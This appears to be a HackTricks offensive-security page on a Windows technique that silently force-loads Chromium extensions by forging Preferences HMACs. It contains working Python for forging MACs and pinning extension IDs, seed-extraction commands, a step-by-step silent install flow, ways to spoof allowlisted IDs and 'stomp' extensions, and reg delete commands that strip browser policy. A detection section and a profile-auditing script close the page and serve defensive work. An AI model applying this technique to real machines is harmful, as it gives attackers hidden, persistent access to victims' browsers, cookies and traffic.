Forced Extension Load & Preferences MAC Forgery (Windows)


tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Overview

Stealthy post-exploitation technique to force-load arbitrary extensions in Chromium-based browsers on Windows by editing the user's Preferences/Secure Preferences and forging valid HMACs for the modified nodes. Works against Chrome/Chromium, Edge and Brave. Observed working from Chromium 130 through 139 at the time of publication. A simple disk-write primitive inside the victim's profile is enough to persist a fully-privileged extension without command-line flags or any user prompt.

Key idea: Chromium keeps per-user extension state in a JSON preferences file and protects it with HMAC-SHA256. If you compute valid MACs with the browser's embedded seed and write them alongside the nodes you injected, the browser accepts them and activates your extension entry.

Where the extension state lives (Windows)

  • Chrome profile not joined to a domain:
  • %USERPROFILE%/AppData/Local/Google/Chrome/User Data/Default/Secure Preferences (includes a root "super_mac").
  • Domain-joined Chrome profile:
  • %USERPROFILE%/AppData/Local/Google/Chrome/User Data/Default/Preferences
  • Relevant nodes used by Chromium:
  • extensions.settings.<extension_id> → embedded manifest/metadata for the extension entry
  • protection.macs.extensions.settings.<extension_id> → HMAC for that JSON blob
  • Chromium ≥134: extensions.ui.developer_mode (boolean) must be present and MAC-signed for unpacked extensions to activate

Simplified layout (illustrative, not strict JSON because of the comment):

```json
{
  "extensions": {
    "settings": {
      "<extension_id>": {
        "name": "Extension name",
        "manifest_version": 3,
        "version": "1.0",
        "key": "<BASE64 DER SPKI>",
        "path": "<absolute path if unpacked>",
        "state": 1,
        "from_bookmark": false,
        "was_installed_by_default": false
        // ...rest of manifest.json + required install metadata
      }
    },
    "ui": { "developer_mode": true }
  },
  "protection": {
    "macs": {
      "extensions": {
        "settings": { "<extension_id>": "<MAC>" },
        "ui": { "developer_mode": "<MAC>" }
      }
    }
  }
}
```

Notes:

  • Edge/Brave keep the same structure. The protection seed value may differ (in some builds Edge/Brave were observed using a null or a different seed).

Extension IDs: path vs key, and how to make them deterministic

Chromium derives the extension ID as follows:

  • Packed/signed extension: ID = SHA-256 over the DER-encoded SubjectPublicKeyInfo (SPKI) → take the first 32 hex chars → map 0–f to a–p
  • Unpacked (no key in the manifest): ID = SHA-256 over the absolute installation path bytes → map 0–f to a–p

To pin the ID across hosts, embed a fixed base64 DER public key in manifest.json under "key". The ID is then derived from this key instead of the installation path.

Helper to generate a deterministic ID and key pair:

```python
import base64
import hashlib
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa

def translate_crx_id(s: str) -> str:
    # Chromium maps each hex digit 0-f of the truncated digest to the letters a-p
    t = {'0':'a','1':'b','2':'c','3':'d','4':'e','5':'f','6':'g','7':'h',
         '8':'i','9':'j','a':'k','b':'l','c':'m','d':'n','e':'o','f':'p'}
    return ''.join(t.get(c, c) for c in s)

def generate_extension_keys() -> tuple[str, str, str]:
    priv = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    pub = priv.public_key()
    # DER SubjectPublicKeyInfo: this is what goes into manifest "key" and what the ID is hashed from
    spki = pub.public_bytes(encoding=serialization.Encoding.DER,
                            format=serialization.PublicFormat.SubjectPublicKeyInfo)
    # ID = first 16 bytes (32 hex chars) of SHA-256(SPKI), mapped to a-p
    crx_id = translate_crx_id(hashlib.sha256(spki).digest()[:16].hex())
    pub_b64 = base64.b64encode(spki).decode('utf-8')
    priv_der = priv.private_bytes(encoding=serialization.Encoding.DER,
                                  format=serialization.PrivateFormat.TraditionalOpenSSL,
                                  encryption_algorithm=serialization.NoEncryption())
    priv_b64 = base64.b64encode(priv_der).decode('utf-8')
    return crx_id, pub_b64, priv_b64

print(generate_extension_keys())
```

Add the generated public key to your manifest.json to pin the ID:

```json
{
  "manifest_version": 3,
  "name": "Synacktiv extension",
  "version": "1.0",
  "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2lMCg6..."
}
```

Forging Preferences integrity MACs (core bypass)

Chromium protects preferences with HMAC-SHA256 over the "path" + serialized JSON value of each node. The HMAC seed is embedded in the browser's resources.pak and was still valid up to Chromium 139.

Extract the seed with GRIT's pak_util and locate the seed container (file id 146 in the tested builds):

```bash
python3 pak_util.py extract resources.pak -o resources_v139/
python3 pak_util.py extract resources.pak -o resources_v139_dirty/
# compare a clean vs minimally modified resources.pak to spot the seed holder
xxd -p resources_v139/146
# e748f336d85ea5f9dcdf25d8f347a65b4cdf667600f02df6724a2af18a212d26b788a25086910cf3a90313696871f3dc05823730c91df8ba5c4fd9c884b505a8
```

Compute the MACs (upper-case hex) as:

```text
ext_mac = HMAC_SHA256(seed,
    "extensions.settings.<crx_id>" + json.dumps(<settings_json>))

devmode_mac = HMAC_SHA256(seed,
    "extensions.ui.developer_mode" + ("true" or "false"))
```

Minimal Python example:

```python
import json, hmac, hashlib

def mac_upper(seed_hex: str, pref_path: str, value) -> str:
    seed = bytes.fromhex(seed_hex)
    # Compact JSON to match Chromium serialization closely; string values are used verbatim
    val = json.dumps(value, separators=(',', ':')) if not isinstance(value, str) else value
    msg = (pref_path + val).encode('utf-8')
    return hmac.new(seed, msg, hashlib.sha256).hexdigest().upper()

# Example usage: placeholders, replace with the seed extracted from resources.pak,
# your own extension ID and the settings node you are writing
seed_hex = "00" * 64
crx_id = "a" * 32
settings_json = {"name": "Extension name", "manifest_version": 3, "version": "1.0", "state": 1}

settings_path = f"extensions.settings.{crx_id}"
devmode_path = "extensions.ui.developer_mode"
ext_mac = mac_upper(seed_hex, settings_path, settings_json)
devmode_mac = mac_upper(seed_hex, devmode_path, "true")
```

Place the resulting values under:

  • protection.macs.extensions.settings.<crx_id> = ext_mac
  • protection.macs.extensions.ui.developer_mode = devmode_mac (Chromium ≥134)

Browser differences: on Microsoft Edge and Brave the seed may be null/different. The HMAC construction stays the same; adjust the seed accordingly.

Implementation notes

  • Use exactly the same JSON serialization Chromium uses when computing the MACs (compact JSON without whitespace is safe in practice; sorting keys can help avoid ordering problems).
  • Make sure extensions.ui.developer_mode is present and signed on Chromium ≥134, otherwise your unpacked entry will not activate.

End-to-end silent load flow (Windows)

  1. Generate the intended ID and place "key" in manifest.json; prepare an unpacked MV3 extension with the intended permissions (service worker/content scripts)
  2. Build extensions.settings.<extension_id> by embedding the manifest plus the minimum install metadata Chromium requires (state, path for unpacked, etc.)
  3. Extract the HMAC seed from resources.pak (file 146) and compute both MACs: one for the settings node and one for extensions.ui.developer_mode (Chromium ≥134)
  4. Write the crafted nodes and MACs into the target profile's Preferences/Secure Preferences; the next launch activates your extension automatically with all declared permissions

Bypassing enterprise controls

  • Allowlisted extension hash spoofing (ID spoofing)
  1. Install an allowlisted Web Store extension and note its ID
  2. Obtain its public key (e.g. via chrome.runtime.getManifest().key in the background/service worker, or by fetching and parsing its .crx)
  3. Set that key as manifest.key in your modified extension so it yields the same ID
  4. Register the entry in Preferences and sign the MACs → an ExtensionInstallAllowlist check that relies on the ID alone is bypassed
  • Extension stomping (ID collision precedence)
  • If a local unpacked extension has the same ID as an installed Web Store extension, Chromium prefers the unpacked one. In practice this replaces the legitimate extension in chrome://extensions while keeping the recognised ID. Confirmed on Chrome and Edge (e.g. Adobe PDF)
  • Disabling GPO via HKCU (requires admin)
  • Chrome/Edge policies live under HKCU\Software\Policies*
  • With admin rights, delete/modify the policy keys before writing your entries to avoid restrictions:

```powershell
reg delete "HKCU\Software\Policies\Google\Chrome\ExtensionInstallAllowlist" /f
reg delete "HKCU\Software\Policies\Google\Chrome\ExtensionInstallBlocklist" /f
```

Noisy alternative: command-line loading

From Chromium ≥137, --load-extension additionally requires passing:

```text
--disable-features=DisableLoadExtensionCommandLineSwitch
```

This technique is well known and monitored (e.g. by EDR/DFIR; it is also used by commodity malware such as Chromeloader). Preference MAC forging is stealthier.

Related flags and more cross‑platform tricks are discussed here:

macOS Chromium Injection

Operational impact

Once accepted, the extension runs with its declared permissions, meaning DOM access, request interception/redirects, cookie/storage access and screenshot capture: effectively in-browser code execution and durable user-profile persistence. Remote deployment over SMB or other channels is straightforward because activation is purely data-driven through Preferences.

Detection and hardening

  • Monitor non-Chromium processes writing to Preferences/Secure Preferences, especially new nodes under extensions.settings that arrive together with protection.macs entries
  • Alert on unexpected flips of extensions.ui.developer_mode and on HMAC-valid but unapproved extension entries
  • Audit HKCU/HKLM Software\Policies for tampering; enforce policies through device management/Chrome Browser Cloud Management
  • Prefer forced-install from the store and verified publishers over allowlists that match on extension ID alone
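The ID derivation rules and the detection points above can be combined into a profile audit. The following is an added example written for this page, not Synacktiv's or HackTricks' own tooling: it recomputes the page's HMAC construction for each extensions.settings node and for extensions.ui.developer_mode, re-derives the expected ID from the embedded "key" (or from the path for keyless unpacked entries) and flags unpacked entries that reuse an allowlisted ID, which is the stomping/spoofing case. The seed, the Preferences fragment, the key bytes and the allowlist are constructed placeholders; the flattened entry layout follows the page's simplified diagram, so a real profile may need the node paths adjusted and the seed taken from resources.pak.

```python
import base64
import hashlib
import hmac
import json

# Constructed placeholder seed: the real value is the 64-byte blob the page extracts
# from resources.pak (file id 146 in the builds it tested).
SEED_HEX = "11" * 64


def _hex_to_crx(hex32: str) -> str:
    """Map the 32 hex chars of a truncated SHA-256 digest onto Chromium's a-p alphabet."""
    return "".join(chr(ord("a") + int(c, 16)) for c in hex32)


def crx_id_from_spki(spki_der: bytes) -> str:
    """ID of a packed/signed extension: first 16 bytes of SHA-256 over the SPKI DER."""
    return _hex_to_crx(hashlib.sha256(spki_der).digest()[:16].hex())


def crx_id_from_path(abs_path: str) -> str:
    """ID of an unpacked extension without a manifest key: SHA-256 over the path bytes."""
    return _hex_to_crx(hashlib.sha256(abs_path.encode("utf-8")).digest()[:16].hex())


def pref_mac(seed: bytes, pref_path: str, value) -> str:
    """HMAC-SHA256(seed, path + compact JSON value), upper-case hex, as the page describes."""
    serialized = value if isinstance(value, str) else json.dumps(value, separators=(",", ":"))
    return hmac.new(seed, (pref_path + serialized).encode("utf-8"), hashlib.sha256).hexdigest().upper()


def audit_preferences(prefs: dict, seed_hex: str, allowlisted_ids: set) -> list:
    """Return (node, finding) pairs a defender should look at for one Preferences document."""
    seed = bytes.fromhex(seed_hex)
    findings = []
    ext = prefs.get("extensions", {})
    macs = prefs.get("protection", {}).get("macs", {}).get("extensions", {})

    # developer_mode: a valid MAC only proves the writer knew the seed, so the flip itself is the signal
    dev_mode = ext.get("ui", {}).get("developer_mode")
    if dev_mode is not None:
        node = "extensions.ui.developer_mode"
        expected = pref_mac(seed, node, "true" if dev_mode else "false")
        if not hmac.compare_digest(macs.get("ui", {}).get("developer_mode", ""), expected):
            findings.append((node, "mac_invalid"))
        if dev_mode is True:
            findings.append((node, "developer_mode_on"))

    for ext_id, entry in ext.get("settings", {}).items():
        node = f"extensions.settings.{ext_id}"
        if not hmac.compare_digest(macs.get("settings", {}).get(ext_id, ""), pref_mac(seed, node, entry)):
            findings.append((ext_id, "mac_invalid"))
        key_b64 = entry.get("key")
        if key_b64 and crx_id_from_spki(base64.b64decode(key_b64)) != ext_id:
            findings.append((ext_id, "key_id_mismatch"))
        path = entry.get("path")
        if path:
            findings.append((ext_id, "unpacked"))
            if ext_id in allowlisted_ids:
                # an unpacked entry carrying a store ID is the stomping / allowlist-spoofing pattern
                findings.append((ext_id, "allowlisted_id_unpacked"))
            if not key_b64 and crx_id_from_path(path) != ext_id:
                findings.append((ext_id, "path_id_mismatch"))
    return findings


def sample_preferences():
    """Constructed Preferences fragment in the page's simplified layout (not a real profile)."""
    seed = bytes.fromhex(SEED_HEX)
    store_key = b"constructed SPKI bytes for a store extension, not a real key"
    stomped_key = b"constructed SPKI bytes copied from an allowlisted extension"
    ids = {"store": crx_id_from_spki(store_key), "stomped": crx_id_from_spki(stomped_key), "bad": "a" * 32}
    settings = {
        ids["store"]: {"name": "Store extension", "manifest_version": 3, "version": "1.0",
                       "key": base64.b64encode(store_key).decode(), "state": 1},
        ids["stomped"]: {"name": "Unpacked copy reusing an allowlisted ID", "manifest_version": 3,
                         "version": "1.0", "key": base64.b64encode(stomped_key).decode(),
                         "path": "C:\\Users\\victim\\AppData\\Local\\Temp\\ext", "state": 1},
        ids["bad"]: {"name": "Entry whose key does not derive to its ID", "manifest_version": 3,
                     "version": "1.0", "key": base64.b64encode(b"unrelated key bytes").decode(), "state": 1},
    }
    # MACs exist (and verify) for the first two entries only; the third was written without one
    macs = {i: pref_mac(seed, f"extensions.settings.{i}", v) for i, v in settings.items() if i != ids["bad"]}
    prefs = {
        "extensions": {"settings": settings, "ui": {"developer_mode": True}},
        "protection": {"macs": {"extensions": {
            "settings": macs,
            "ui": {"developer_mode": pref_mac(seed, "extensions.ui.developer_mode", "true")}}}},
    }
    return prefs, {ids["store"], ids["stomped"]}, ids


if __name__ == "__main__":
    prefs, allowlist, _ = sample_preferences()
    for node, why in audit_preferences(prefs, SEED_HEX, allowlist):
        print(f"{why:24} {node}")
```

The point of the sample is that the stomped entry carries a perfectly valid MAC and a key that really does derive to its ID, so neither integrity check fires; it is only caught because an allowlisted store ID should never appear as an unpacked install. To run this against a real profile, load the Preferences JSON from the paths listed earlier, feed in the seed recovered from resources.pak, and build the allowlist from the ExtensionInstallAllowlist policy.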
